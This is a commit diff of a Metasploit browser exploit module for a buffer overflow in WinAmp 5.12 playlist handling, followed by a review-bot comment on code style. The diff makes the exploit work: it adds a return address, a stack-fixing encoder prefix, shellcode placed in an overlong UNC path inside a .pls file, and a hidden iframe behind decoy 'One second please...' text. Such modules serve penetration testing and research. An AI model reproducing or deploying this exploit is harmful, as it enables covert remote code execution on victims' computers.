Woo, neat krad winamp exploit :)
git-svn-id: file:///home/svn/incoming/trunk@3479 4d416f70-5f16-0410-b530-b9f4589650da
parent
cd06c10aba
commit
7ee4d05bec
|
@ -26,7 +26,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'process',
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -36,11 +36,19 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'ConnectionType' => '-find',
|
'ConnectionType' => '-find',
|
||||||
},
|
},
|
||||||
|
|
||||||
|
# Landing on \x5c\x5c trashes esp, restore from ecx
|
||||||
|
'PrependEncoder' => "\x87\xe1",
|
||||||
|
|
||||||
|
# Dont need them, dont want them, preserve esi
|
||||||
|
'DisableNops' => true,
|
||||||
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'WinAmp 5.12', { }],
|
# Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
|
||||||
|
[ 'WinAmp 5.12', { 'Ret' => 0x0d45fece }],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jan 29 2006',
|
'DisclosureDate' => 'Jan 29 2006',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
@ -54,10 +62,12 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
if (not request.uri.match(/\.pls$/i))
|
if (not request.uri.match(/\.pls$/i))
|
||||||
html =
|
html =
|
||||||
"<html><iframe src='" + get_resource + '/' +
|
"<html><body>"+
|
||||||
|
"<iframe style='position:absolute;visibility:hidden;' " +
|
||||||
|
"src='" + get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
||||||
".pls'></iframe>" +
|
".pls'></iframe>" +
|
||||||
"<body>One second please...</body></html>"
|
"One second please...</body></html>"
|
||||||
send_response(cli, html)
|
send_response(cli, html)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -73,11 +83,15 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_playlist(payload)
|
def generate_playlist(payload)
|
||||||
|
|
||||||
file = Rex::Text.pattern_create(2048)
|
name = "The Metasploit(TM) Theme Song"
|
||||||
|
file = Rex::Text.rand_text_english(1026)
|
||||||
|
file[1022 , 4] = [target.ret].pack('V')
|
||||||
|
file[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
play =
|
play =
|
||||||
"[playlist]\r\n" +
|
"[playlist]\r\n" +
|
||||||
"File1=\\\\" + file + "\r\n" +
|
"File1=\\\\#{file}\r\n" +
|
||||||
"Title1=~BOF~\r\n" +
|
"Title1=#{name}\r\n" +
|
||||||
"Length1=FFF\r\n" +
|
"Length1=FFF\r\n" +
|
||||||
"NumberOfEntries=1\r\n" +
|
"NumberOfEntries=1\r\n" +
|
||||||
"Version=2\r\n"
|
"Version=2\r\n"
|
||||||
|
|
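Review bot: In generate_playlist the new `play` assignment mixes interpolation (`"File1=\\\\#{file}\r\n"`, `"Title1=#{name}\r\n"`) with a seven-term `+` chain; building the record list once and joining it reads more clearly and keeps the CRLF terminators in one place, e.g. `play = ["[playlist]", "File1=\\\\#{file}", "Title1=#{name}", "Length1=FFF", "NumberOfEntries=1", "Version=2", ""].join("\r\n")`. The `html` builder in the earlier hunk (the `"<html><body>"+` chain) has the same shape and could get the same treatment. The sizes `1026` and `1022` in `rand_text_english(1026)` and `file[1022, 4]` are bare magic numbers; a named local or a one-line comment stating how they relate would help the next maintainer. generate_playlist's closing `end` lies outside the hunk.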